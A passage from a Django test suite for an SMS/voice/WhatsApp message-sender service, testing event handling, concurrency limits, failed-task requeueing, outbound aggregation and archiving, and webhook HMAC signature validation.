        ConcurrencyLimiter.decr_message_count(channel, get_utc(1479131588))
        ConcurrencyLimiter.decr_message_count(channel, get_utc(1479131608))
        self.assertEqual(
            self.fake_cache.cache_data,
            {
                "JUNE_VOICE_messages_at_24652192": 1,
                "JUNE_VOICE_messages_at_24652193": 0,
                "JUNE_VOICE_messages_at_24652194": 0,
            },
        )

    @responses.activate
    def test_event_nack_concurrency_decr(self):
        """
        When receiving a nack, we should decrement the correct concurrency
        limiter for the channel that the nack is for.
        """
        self.add_metrics_response()
        channel = Channel.objects.get(channel_id="VUMI_VOICE")
        outbound_message = {
            "to_addr": "+27820000123",
            "vumi_message_id": "08b34de7-c6da-4853-a74d-9458533ed169",
            "content": "Simple outbound message",
            "channel": channel,
            "delivered": False,
            "attempts": 3,
            "metadata": {},
        }
        failed = Outbound.objects.create(**outbound_message)
        failed.last_sent_time = failed.created_at
        failed.save()
        post_save.connect(
            psh_fire_msg_action_if_new,
            sender=Outbound,
            dispatch_uid="psh_fire_msg_action_if_new",
        )
        nack = {
            "message_type": "event",
            "event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
            "event_type": "nack",
            "nack_reason": "no answer",
            "user_message_id": failed.vumi_message_id,
            "helper_metadata": {},
            "timestamp": "2015-10-28 16:20:37.485612",
            "sent_message_id": "external-id",
        }
        with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
            response = self.client.post(
                "/api/v1/events", json.dumps(nack), content_type="application/json"
            )
            mock_method.assert_called_once_with(channel, failed.created_at)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=failed.id)
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 3)  # not moved on as last attempt passed
        self.assertEqual(
            False,
            self.check_logs(
                # BUGFIX: restored the space before "[session_event" so this
                # searches for the real log line (cf. test_event_nack in
                # TestWassupEventsApi); without it the absence check was
                # vacuously true.
                "Message: 'Simple outbound message' sent to '+27820000123' "
                "[session_event: new]"
            ),
        )
        self.assertEqual(d.metadata["nack_reason"], "no answer")

    @responses.activate
    @patch("django.core.cache.cache.get_or_set")
    @patch("django.core.cache.cache.decr")
    @patch("message_sender.views.fire_delivery_hook")
    @patch("message_sender.tasks.send_message.delay")
    def test_event_nack_concurrency_decr_junebug(
        self, mock_send_message, mock_hook, mock_decr, mock_get_or_set
    ):
        """
        A rejected event should retry and update the message object accordingly
        as well as decrement the relative concurrency limiter
        """
        self.add_metrics_response()
        # Fake cache calls. @patch decorators are applied bottom-up, so the
        # mock arguments are: send_message.delay, fire_delivery_hook,
        # cache.decr, cache.get_or_set. (The previous parameter naming had
        # decr and get_or_set swapped, wiring each mock to the wrong
        # side_effect.)
        mock_get_or_set.side_effect = self.fake_cache.get_or_set
        mock_decr.side_effect = self.fake_cache.decr
        channel = Channel.objects.get(channel_id="VUMI_VOICE")
        d = self.make_outbound(to_addr="+27820000123", channel=channel.channel_id)
        d.last_sent_time = d.created_at
        d.save()
        post_save.connect(
            psh_fire_msg_action_if_new,
            sender=Outbound,
            dispatch_uid="psh_fire_msg_action_if_new",
        )
        nack = {
            "event_type": "rejected",
            "message_id": d.vumi_message_id,
            "channel-id": "channel-uuid-1234",
            "timestamp": "2015-10-28 16:19:37.485612",
            "event_details": {"reason": "No answer"},
        }
        with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
            response = self.client.post(
                "/api/v1/events/junebug",
                json.dumps(nack),
                content_type="application/json",
            )
            mock_method.assert_called_once_with(channel, d.created_at)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d.refresh_from_db()
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 0)
        self.assertEqual(d.metadata["nack_reason"], {"reason": "No answer"})
        mock_hook.assert_called_once_with(d)

    @responses.activate
    @patch("django.core.cache.cache.get_or_set")
    @patch("django.core.cache.cache.decr")
    @patch("message_sender.views.fire_delivery_hook")
    @patch("message_sender.tasks.send_message.delay")
    def test_event_delivery_failed_concurrency_decr_june(
        self, mock_send_message, mock_hook, mock_decr, mock_get_or_set
    ):
        """
        A failed delivery should retry and update the message accordingly, as
        well as decrement the concurrency limiter.
        """
        self.add_metrics_response()
        # Fake cache calls (see the decorator-order note in the nack test).
        mock_get_or_set.side_effect = self.fake_cache.get_or_set
        mock_decr.side_effect = self.fake_cache.decr
        channel = Channel.objects.get(channel_id="VUMI_VOICE")
        d = self.make_outbound(to_addr="+27820000123", channel=channel.channel_id)
        d.last_sent_time = d.created_at
        d.save()
        dr = {
            "event_type": "delivery_failed",
            "message_id": d.vumi_message_id,
            "channel-id": "channel-uuid-1234",
            "timestamp": "2015-10-28 16:19:37.485612",
            "event_details": {},
        }
        with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
            response = self.client.post(
                "/api/v1/events/junebug",
                json.dumps(dr),
                content_type="application/json",
            )
            mock_method.assert_called_once_with(channel, d.created_at)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d.refresh_from_db()
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 0)
        self.assertEqual(d.metadata["delivery_failed_reason"], {})
        mock_hook.assert_called_once_with(d)
class TestRequeueFailedTasks(AuthenticatedAPITestCase):
    """Tests for the requeue_failed_tasks task."""

    def make_outbound(self, to_addr, channel=None):
        """Create an Outbound without firing the post-save send task."""
        if channel:
            channel = Channel.objects.get(channel_id=channel)
        self.add_identity_search_response(to_addr, "34857985789")
        self._replace_post_save_hooks_outbound()  # don't let fixtures fire
        outbound = Outbound.objects.create(
            to_addr=to_addr,
            vumi_message_id="075a32da-e1e4-4424-be46-1d09b71056fd",
            content="Simple outbound message",
            delivered=False,
            metadata={"voice_speech_url": "http://test.com"},
            channel=channel,
        )
        self._restore_post_save_hooks_outbound()  # let tests fire tasks
        return outbound

    @responses.activate
    def test_requeue(self):
        """
        requeue_failed_tasks must rerun every failed task and delete the
        corresponding OutboundSendFailure records.
        """
        self.add_metrics_response()
        failed_outbound = self.make_outbound(to_addr="+27820000123")
        untouched_outbound = self.make_outbound(to_addr="+27987")
        OutboundSendFailure.objects.create(
            outbound=failed_outbound,
            task_id=uuid.uuid4(),
            initiated_at=timezone.now(),
            reason="Error",
        )
        requeue_failed_tasks()
        # Only the message with a failure record is resent.
        failed_outbound.refresh_from_db()
        self.assertIsNotNone(failed_outbound.last_sent_time)
        untouched_outbound.refresh_from_db()
        self.assertIsNone(untouched_outbound.last_sent_time)
        self.assertEqual(OutboundSendFailure.objects.all().count(), 0)
class TestFailedMsisdnLookUp(TestCase):
    """Tests for the identity.no_address webhook."""

    def add_identity_no_address_search_response(self, msisdn, identity, count=0):
        """Mock an identity address lookup that returns no addresses."""
        empty_page = {"next": None, "previous": None, "results": []}
        responses.add(
            responses.GET,
            "%s/identities/%s/addresses/msisdn"
            % (settings.IDENTITY_STORE_URL, identity),  # noqa
            json=empty_page,
            status=200,
        )

    @responses.activate
    def test_fire_failed_msisdn_lookup(self):
        """
        trigger a webhook if there is no to_addr in the identity
        """
        task = SendMessage()
        Channel.objects.create(
            channel_id="NEW_DEFAULT",
            channel_type=Channel.JUNEBUG_TYPE,
            default=True,
            configuration={
                "JUNEBUG_API_URL": "http://example.com/",
                "JUNEBUG_API_AUTH": ("username", "password"),
                "JUNEBUG_API_FROM": "+4321",
            },
            concurrency_limit=0,
            message_timeout=0,
            message_delay=0,
        )
        self.assertEqual(Channel.objects.filter(default=True).count(), 1)
        channel = Channel.objects.get(channel_id="NEW_DEFAULT")
        self.add_identity_no_address_search_response("", "0c03d360")
        Outbound.objects.create(
            id="075a32da-e1e4-4424-be46-1d09b71056fd",
            to_identity="0c03d360",
            to_addr="",
            content="Simple outbound message",
            delivered=False,
            metadata={"voice_speech_url": "https://foo.com/file.mp3"},
            channel=channel,
        )
        user = User.objects.create_user("test")
        hook = Hook.objects.create(
            event="identity.no_address", target="http://webhook", user=user
        )
        responses.add(method=responses.POST, url="http://webhook", json={}, status=200)
        task.run("075a32da-e1e4-4424-be46-1d09b71056fd")
        # The last HTTP call must be the webhook fire with the identity.
        webhook_request = responses.calls[-1].request
        self.assertEqual(
            json.loads(webhook_request.body),
            {"hook": hook.dict(), "data": {"to_identity": "0c03d360"}},
        )
class TestFailedTaskAPI(AuthenticatedAPITestCase):
    """Tests for the failed-tasks API endpoint."""

    def make_outbound(self, to_addr, channel=None):
        """Create an Outbound without firing the post-save send task."""
        if channel:
            channel = Channel.objects.get(channel_id=channel)
        self.add_identity_search_response(to_addr, "34857985789")
        self._replace_post_save_hooks_outbound()  # don't let fixtures fire
        outbound = Outbound.objects.create(
            to_addr=to_addr,
            vumi_message_id="075a32da-e1e4-4424-be46-1d09b71056fd",
            content="Simple outbound message",
            delivered=False,
            metadata={"voice_speech_url": "http://test.com"},
            channel=channel,
        )
        self._restore_post_save_hooks_outbound()  # let tests fire tasks
        return outbound

    @responses.activate
    def test_failed_tasks_list(self):
        """
        GET on the failed tasks endpoint must return a paginated list of
        failures, newest first.
        """
        self.add_metrics_response()
        outbound = self.make_outbound(to_addr="+27820000123")
        failures = [
            OutboundSendFailure.objects.create(
                outbound=outbound,
                task_id=uuid.uuid4(),
                initiated_at=timezone.now(),
                reason="Error",
            )
            for _ in range(3)
        ]
        response = self.client.get(
            "/api/v1/failed-tasks/", content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        page = response.data["results"]
        self.assertEqual(len(page), 2)
        self.assertEqual(page[0]["id"], failures[2].id)
        self.assertEqual(page[1]["id"], failures[1].id)
        self.assertIsNotNone(response.data["next"])
        # Follow the pagination link for the remaining failure.
        response = self.client.get(
            response.data["next"], content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        page = response.data["results"]
        self.assertEqual(len(page), 1)
        self.assertEqual(page[0]["id"], failures[0].id)

    @responses.activate
    def test_failed_tasks_requeue(self):
        """
        POST on the failed tasks endpoint must requeue all failed tasks
        and delete the failure records.
        """
        self.add_metrics_response()
        outbound = self.make_outbound(to_addr="+27820000123")
        OutboundSendFailure.objects.create(
            outbound=outbound,
            task_id=uuid.uuid4(),
            initiated_at=timezone.now(),
            reason="Error",
        )
        response = self.client.post(
            "/api/v1/failed-tasks/", content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(response.data["requeued_failed_tasks"], True)
        self.assertEqual(OutboundSendFailure.objects.all().count(), 0)
class TestOutboundAdmin(AuthenticatedAPITestCase):
    """Tests for the Outbound admin "resend_outbound" action."""

    def setUp(self):
        super(TestOutboundAdmin, self).setUp()
        # Admin changelist actions require a logged-in superuser session.
        self.adminclient.login(username="testsu", password="dummypwd")

    @patch("message_sender.tasks.send_message.apply_async")
    def test_resend_outbound_only_selected(self, mock_send_message):
        """Only the selected outbound should be resent."""
        selected = self.make_outbound()
        self.make_outbound()  # a second message that must NOT be resent
        response = self.adminclient.post(
            reverse("admin:message_sender_outbound_changelist"),
            {"action": "resend_outbound", "_selected_action": [selected]},
            follow=True,
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertContains(response, "Attempting to resend 1 message.")
        mock_send_message.assert_called_once_with(kwargs={"message_id": selected})

    @patch("message_sender.tasks.send_message.apply_async")
    def test_resend_outbound_multiple(self, mock_send_message):
        """Every selected outbound should be resent."""
        selected = [self.make_outbound(), self.make_outbound()]
        response = self.adminclient.post(
            reverse("admin:message_sender_outbound_changelist"),
            {"action": "resend_outbound", "_selected_action": selected},
            follow=True,
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertContains(response, "Attempting to resend 2 messages.")
        for outbound_id in selected:
            mock_send_message.assert_any_call(kwargs={"message_id": outbound_id})
class TestChannels(AuthenticatedAPITestCase):
    """Tests for Channel model save behaviour."""

    def test_channel_default_post_save(self):
        """Saving a channel with default=True must leave exactly one default
        channel in the database."""
        Channel.objects.create(
            channel_id="NEW_DEFAULT",
            channel_type=Channel.JUNEBUG_TYPE,
            default=True,
            configuration={
                "JUNEBUG_API_URL": "http://example.com/",
                "JUNEBUG_API_AUTH": ("username", "password"),
                "JUNEBUG_API_FROM": "+4321",
            },
            concurrency_limit=0,
            message_timeout=0,
            message_delay=0,
        )
        self.assertEqual(Channel.objects.filter(default=True).count(), 1)
        # Promoting a different channel to default must still leave only one
        # channel flagged as default.
        junebug_voice = Channel.objects.get(channel_id="JUNE_VOICE")
        junebug_voice.default = True
        junebug_voice.save()
        self.assertEqual(Channel.objects.filter(default=True).count(), 1)
class TestUpdateIdentityCommand(AuthenticatedAPITestCase):
    """Tests for the ``update_identity_field`` management command."""

    def make_identity_lookup(self, msisdn="+27820000123", identity="56f6e9506ee3"):
        """Create an IdentityLookup mapping ``msisdn`` to ``identity``."""
        return IdentityLookup.objects.create(msisdn=msisdn, identity=identity)

    def prepare_data(self):
        """Create in/outbound messages with and without a matching lookup."""
        self.out1 = self.make_outbound()
        self.out2 = self.make_outbound(to_addr="+274321", to_identity="")
        self.in1 = self.make_inbound("1234", from_addr="+27820000123")
        self.in2 = self.make_inbound("1234", from_addr="+274321")
        self.make_identity_lookup()

    def check_data(self):
        """Assert identity fields were populated only where a lookup matched,
        and that matched addresses were cleared."""
        expectations = [
            # (model, pk, addr field, identity field, expected addr, expected id)
            (Outbound, self.out1, "to_addr", "to_identity", "", "56f6e9506ee3"),
            (Outbound, self.out2, "to_addr", "to_identity", "+274321", ""),
            (Inbound, self.in1, "from_addr", "from_identity", "", "56f6e9506ee3"),
            (Inbound, self.in2, "from_addr", "from_identity", "+274321", ""),
        ]
        for model, pk, addr_field, identity_field, addr, identity in expectations:
            record = model.objects.get(id=pk)
            self.assertEqual(str(getattr(record, addr_field)), addr)
            self.assertEqual(str(getattr(record, identity_field)), identity)

    def _run_and_check(self, *args):
        """Run the command with ``args`` and verify the resulting data."""
        self.prepare_data()
        call_command("update_identity_field", *args)
        self.check_data()

    def test_update_identity_no_argument(self):
        self._run_and_check()

    def test_update_identity_by_id(self):
        self._run_and_check("--loop", "ID")

    def test_update_identity_by_msg(self):
        self._run_and_check("--loop", "MSG")

    def test_update_identity_by_sql(self):
        self._run_and_check("--loop", "SQL")
class TestAggregateOutbounds(AuthenticatedAPITestCase):
    """Tests for the aggregate_outbounds task and its trigger view."""

    def _make_outbound_at(self, channel, created_at, **overrides):
        """Create an Outbound on ``channel``, backdate it to ``created_at``,
        apply any field ``overrides``, and return the saved instance."""
        outbound = Outbound.objects.get(id=self.make_outbound(channel=channel))
        outbound.created_at = created_at
        for field, value in overrides.items():
            setattr(outbound, field, value)
        outbound.save()
        return outbound

    def test_aggregate_outbounds(self):
        """
        The aggregate outbounds task should create new AggregateOutbounds
        objects that represent the current Outbounds
        """
        c1 = Channel.objects.create(channel_id="c1", configuration={})
        c2 = Channel.objects.create(channel_id="c2", configuration={})
        day1 = datetime(2017, 1, 1, tzinfo=timezone.utc)
        self._make_outbound_at(c1, day1, attempts=2)
        self._make_outbound_at(c1, day1)
        self._make_outbound_at(c2, day1)
        self._make_outbound_at(c2, day1, delivered=True)
        # Outside the aggregated range; must not be counted below.
        self._make_outbound_at(c2, datetime(2017, 1, 3, tzinfo=timezone.utc))
        # Pass the callable and its arguments separately. The previous form
        # called the task eagerly and handed its return value to
        # assertNumQueries; for a None return, assertNumQueries(4, None) just
        # returns an unused context manager and never checks the query count.
        # NOTE(review): the count of 4 is now actually enforced — confirm it
        # matches the task's real query profile.
        self.assertNumQueries(
            4, tasks.aggregate_outbounds, "2017-01-01", "2017-01-02"
        )
        agg1 = AggregateOutbounds.objects.get(
            date=date(2017, 1, 1), channel=c1, delivered=False
        )
        self.assertEqual(agg1.total, 2)
        self.assertEqual(agg1.attempts, 3)
        agg2 = AggregateOutbounds.objects.get(
            date=date(2017, 1, 1), channel=c2, delivered=True
        )
        self.assertEqual(agg2.total, 1)
        self.assertEqual(agg2.attempts, 1)
        agg3 = AggregateOutbounds.objects.get(
            date=date(2017, 1, 1), channel=c2, delivered=False
        )
        self.assertEqual(agg3.total, 1)
        self.assertEqual(agg3.attempts, 1)
        self.assertEqual(AggregateOutbounds.objects.count(), 3)

    def test_aggregate_outbounds_replace(self):
        """
        If the task is run a second time, it should replace all aggregates
        with new aggregates.
        """
        c = Channel.objects.create(channel_id="c1", configuration={})
        for _ in range(10):
            self._make_outbound_at(c, datetime(2017, 1, 1, tzinfo=timezone.utc))
        # Callable and args passed separately — see test_aggregate_outbounds.
        self.assertNumQueries(
            2, tasks.aggregate_outbounds, "2017-01-01", "2017-01-02"
        )
        agg = AggregateOutbounds.objects.get(
            date=date(2017, 1, 1), channel=c, delivered=False
        )
        self.assertEqual(agg.total, 10)
        Outbound.objects.all().update(delivered=True)
        # Re-running must replace the existing aggregate, not add a second one.
        self.assertNumQueries(
            2, tasks.aggregate_outbounds, "2017-01-01", "2017-01-02"
        )
        agg = AggregateOutbounds.objects.get(
            date=date(2017, 1, 1), channel=c, delivered=True
        )
        self.assertEqual(agg.total, 10)
        self.assertEqual(AggregateOutbounds.objects.count(), 1)

    @mock.patch("message_sender.views.aggregate_outbounds")
    def test_view_defaults(self, task):
        """
        Should default to today's date for end, and
        AGGREGATE_OUTBOUND_BACKTRACK days in the past for start
        """
        response = self.client.post(
            "/api/v1/aggregate-outbounds/", content_type="application/json"
        )
        self.assertEqual(response.status_code, 202)
        # NOTE(review): computed after the request; could flake if the test
        # straddles midnight.
        end = datetime.now().date().isoformat()
        start = (datetime.now() - timedelta(30)).date().isoformat()
        task.delay.assert_called_once_with(start, end)

    @mock.patch("message_sender.views.aggregate_outbounds")
    def test_view(self, task):
        """
        Should fire the task with the provided parameters
        """
        response = self.client.post(
            "/api/v1/aggregate-outbounds/",
            content_type="application/json",
            data=json.dumps({"start": "2017-01-01", "end": "2017-01-03"}),
        )
        self.assertEqual(response.status_code, 202)
        task.delay.assert_called_once_with("2017-01-01", "2017-01-03")
class ArchivedOutboundsTests(AuthenticatedAPITestCase):
    """Tests for the archive_outbound task and its trigger view."""

    @staticmethod
    def _remove_if_exists(path):
        """Cleanup helper: remove a scratch file if it is still present."""
        if os.path.exists(path):
            os.remove(path)

    def _make_outbound_on(self, created_at):
        """Create an Outbound backdated to ``created_at``; return the instance."""
        outbound = Outbound.objects.get(id=self.make_outbound())
        outbound.created_at = created_at
        outbound.save()
        return outbound

    def test_task_filename(self):
        """
        The filename function should return the appropriate filename
        """
        filename = tasks.archive_outbound.filename(datetime(2017, 8, 9).date())
        self.assertEqual(filename, "outbounds-2017-08-09.gz")

    def test_dump_data(self):
        """
        Serializes outbound messages into a gzipped file
        """
        o = Outbound.objects.get(id=self.make_outbound())
        # Register cleanup first so the scratch file is removed even if
        # dump_data or an assertion below fails (previously os.remove only
        # ran on the success path, leaking the file on failure).
        self.addCleanup(self._remove_if_exists, "test.gz")
        tasks.archive_outbound.dump_data("test.gz", Outbound.objects.all())
        with gzip.open("test.gz") as f:
            [outbound] = [json.loads(line.decode("utf-8")) for line in f]
        # Timestamps are set at creation time and not predictable here.
        outbound.pop("created_at")
        outbound.pop("updated_at")
        self.assertEqual(
            outbound,
            {
                "attempts": o.attempts,
                "call_answered": o.call_answered,
                "channel": o.channel_id,
                "content": o.content,
                "created_by": o.created_by_id,
                "delivered": o.delivered,
                "id": str(o.id),
                "last_sent_time": o.last_sent_time,
                "metadata": o.metadata,
                "resend": o.resend,
                "to_addr": o.to_addr,
                "to_identity": o.to_identity,
                "updated_by": o.updated_by_id,
                "version": o.version,
                "vumi_message_id": o.vumi_message_id,
            },
        )

    def test_create_archived_outbound(self):
        """
        Creates the model with the attached file
        """
        self.addCleanup(self._remove_if_exists, "test")
        with open("test", "w") as f:
            f.write("test")
        tasks.archive_outbound.create_archived_outbound(
            datetime(2017, 8, 9).date(), "test"
        )
        [archive] = ArchivedOutbounds.objects.all()
        self.assertEqual(archive.date, datetime(2017, 8, 9).date())
        self.assertEqual(archive.archive.read().decode("utf-8"), "test")

    def test_task_skips_already_archived(self):
        """
        If there is already an ArchivedOutbounds for the given date, then the
        task should skip processing that date
        """
        self.addCleanup(self._remove_if_exists, "test")
        with open("test", "w") as f:
            f.write("test")
        tasks.archive_outbound.create_archived_outbound(
            datetime(2017, 8, 9).date(), "test"
        )
        self._make_outbound_on(datetime(2017, 8, 9, tzinfo=timezone.utc))
        tasks.archive_outbound("2017-08-09", "2017-08-09")
        # The pre-existing archive is untouched and the outbound not deleted.
        [archive] = ArchivedOutbounds.objects.all()
        self.assertEqual(archive.date, datetime(2017, 8, 9).date())
        self.assertEqual(archive.archive.read().decode("utf-8"), "test")
        self.assertEqual(Outbound.objects.count(), 1)

    def test_task_skips_empty_dates(self):
        """
        If there are no outbounds for the date, then no archive should be
        created
        """
        tasks.archive_outbound("2017-08-09", "2017-08-09")
        self.assertEqual(ArchivedOutbounds.objects.count(), 0)

    def test_task_only_archives_outbounds_for_date(self):
        """
        Only outbounds in the specified date range should be archived
        """
        self._make_outbound_on(datetime(2017, 8, 9, tzinfo=timezone.utc))
        self._make_outbound_on(datetime(2017, 8, 10, tzinfo=timezone.utc))
        self.assertEqual(Outbound.objects.count(), 2)
        tasks.archive_outbound("2017-08-09", "2017-08-09")
        # Only the out-of-range (2017-08-10) message remains.
        self.assertEqual(Outbound.objects.count(), 1)

    def test_task_creates_archive(self):
        """
        The task should serialize the appropriate messages into a gzipped file
        """
        o = self._make_outbound_on(datetime(2017, 8, 9, tzinfo=timezone.utc))
        o.refresh_from_db()
        tasks.archive_outbound("2017-08-09", "2017-08-09")
        self.assertEqual(Outbound.objects.count(), 0)
        [archive] = ArchivedOutbounds.objects.all()
        self.assertEqual(archive.date, datetime(2017, 8, 9).date())
        [outbound] = [
            json.loads(line.decode("utf-8"))
            for line in gzip.GzipFile(fileobj=archive.archive)
        ]
        self.assertEqual(outbound, OutboundArchiveSerializer(o).data)

    @mock.patch("message_sender.views.archive_outbound")
    def test_view(self, task):
        """
        The view should call the task
        """
        response = self.client.post(
            "/api/v1/archive-outbounds/",
            content_type="application/json",
            data=json.dumps({"start": "2017-01-01", "end": "2017-01-03"}),
        )
        self.assertEqual(response.status_code, 202)
        task.delay.assert_called_once_with("2017-01-01", "2017-01-03")
class TestWhatsAppEventAPI(AuthenticatedAPITestCase):
    """Tests for the WhatsApp events webhook endpoint ("whatsapp-events"),
    which receives both delivery statuses and inbound messages."""

    def setUp(self):
        # The view resolves the channel from the URL and uses its HMAC_SECRET
        # to validate the request signature, so the channel must exist before
        # the base class setUp runs.
        self.channel = Channel.objects.create(
            channel_id="test", configuration={"HMAC_SECRET": "testhmac"}
        )
        super().setUp()

    def generate_signature(self, content):
        """Return the base64-encoded HMAC-SHA256 of ``content``, keyed with
        the channel's HMAC_SECRET — the expected value of the
        X-Engage-Hook-Signature request header."""
        h = hmac.new(
            self.channel.configuration["HMAC_SECRET"].encode(), content.encode(), sha256
        )
        return base64.b64encode(h.digest()).decode()

    def test_event_missing_fields(self):
        """
        If there are missing fields in the request, an error response should
        be returned, detailing the errors if this was an event and if this was an inbound
        """
        # Empty status and message objects: every required field is missing.
        data = {"statuses": [{}], "messages": [{}]}
        response = self.client.post(
            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps(data),
            content_type="application/json",
            HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(data)),
        )
        # Each status/message is reported individually with its field errors.
        self.assertEqual(
            json.loads(response.content.decode()),
            {
                "accepted": False,
                "statuses": [
                    {
                        "accepted": False,
                        "id": None,
                        "reason": {
                            "id": ["This field is required."],
                            "status": ["This field is required."],
                            "timestamp": ["This field is required."],
                        },
                    }
                ],
                "messages": [
                    {
                        "accepted": False,
                        "id": None,
                        "reason": {
                            "id": ["This field is required."],
                            "text": ["This field is required."],
                        },
                    }
                ],
            },
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_event_no_message(self):
        """
        If we cannot find the message for the event, an error response should
        be returned.
        """
        # A status for a vumi_message_id that no Outbound has.
        event = {
            "statuses": [
                {
                    "id": "bad-message-id",
                    "status": "sent",
                    "timestamp": "2018-05-04T16:00:18Z",
                }
            ]
        }
        response = self.client.post(
            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps(event),
            content_type="application/json",
            HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(
            json.loads(response.content.decode()),
            {
                "accepted": False,
                "messages": [],
                "statuses": [
                    {
                        "accepted": False,
                        "reason": "Cannot find message for ID bad-message-id",
                        "id": "bad-message-id",
                    }
                ],
            },
        )

    @patch("message_sender.views.fire_delivery_hook")
    def test_event_ack(self, mock_hook):
        """A submitted event should update the message object accordingly."""
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        # A "sent" status keyed on the outbound's vumi_message_id.
        event = {
            "statuses": [
                {
                    "id": d.vumi_message_id,
                    "status": "sent",
                    "timestamp": "2018-05-04T16:00:18Z",
                }
            ]
        }
        response = self.client.post(
            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps(event),
            content_type="application/json",
            HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, True)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata["ack_timestamp"], "2018-05-04T16:00:18Z")
        # No resend was attempted, so no send log entry should exist.
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        # NOTE(review): Django model equality compares pk, so the pre-request
        # instance matches the mock's call argument.
        mock_hook.assert_called_once_with(d)

    @responses.activate
    @patch("message_sender.views.fire_delivery_hook")
    def test_event_nack(self, mock_hook):
        """
        A rejected event should retry and update the message object accordingly
        """
        self.add_metrics_response()
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        # Reconnect the post-save signal so that the retry triggered by the
        # failed status actually fires the send action.
        post_save.connect(
            psh_fire_msg_action_if_new,
            sender=Outbound,
            dispatch_uid="psh_fire_msg_action_if_new",
        )
        event = {
            "statuses": [
                {
                    "id": d.vumi_message_id,
                    "status": "failed",
                    "timestamp": "2018-05-04T16:00:18Z",
                }
            ]
        }
        response = self.client.post(
            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps(event),
            content_type="application/json",
            HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # The failure triggered a retry: not delivered, attempts incremented,
        # and a send log entry is present.
        c = Outbound.objects.get(pk=existing)
        self.assertEqual(c.delivered, False)
        self.assertEqual(c.attempts, 2)
        self.assertEqual(
            True,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123' "
                "[session_event: new]"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @patch("message_sender.views.fire_delivery_hook")
    def test_event_delivery_succeeded(self, mock_hook):
        """A successful delivery should update the message accordingly."""
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        event = {
            "statuses": [
                {
                    "id": d.vumi_message_id,
                    "status": "delivered",
                    "timestamp": "2018-05-04T16:00:18Z",
                }
            ]
        }
        response = self.client.post(
            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps(event),
            content_type="application/json",
            HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, True)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata["delivery_timestamp"], "2018-05-04T16:00:18Z")
        # No resend was attempted, so no send log entry should exist.
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        mock_hook.assert_called_once_with(d)

    def test_missing_channel(self):
        """
        If there's no channel with the specified ID, a 404 response should be returned
        """
        response = self.client.post(
            reverse("whatsapp-events", args=["badchannel"]),
            json.dumps({}),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_missing_hmac_header(self):
        """
        If the signature header is missing, the request should not be allowed
        """
        response = self.client.post(
            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps({}),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            json.loads(response.content),
            {"detail": "X-Engage-Hook-Signature header required"},
        )

    def test_invalid_hmac_header(self):
        """
        If the signature header is invalid, the request should not be allowed
        """
        response = self.client.post(
            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps({}),
            content_type="application/json",
            HTTP_X_ENGAGE_HOOK_SIGNATURE="bad-signature",
        )
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            json.loads(response.content), {"detail": "Invalid hook signature"}
        )

    @responses.activate
    def test_create_inbound(self):
        """
        If an inbound message is sent to the event endpoint, then it should be treated
        as an inbound message.
        """
        responses.add(
            responses.POST, "http://metrics-url/metrics/", json={}, status=201
        )
        # Mock the identity-store lookup for the sender's msisdn.
        identity_uuid = str(uuid.uuid4())
        responses.add(
            responses.GET,
            "{}/identities/search/?details__addresses__msisdn=%2B27820000000".format(
                settings.IDENTITY_STORE_URL
            ),
            json={"results": [{"id": identity_uuid}]},
            status=200,
            match_querystring=True,
        )
        message_id = str(uuid.uuid4())
        post_inbound = {
            "messages": [
                {
                    "id": message_id,
                    "from": "27820000000",
                    "text": {"body": "Test message"},
                }
            ]
        }
        response = self.client.post(
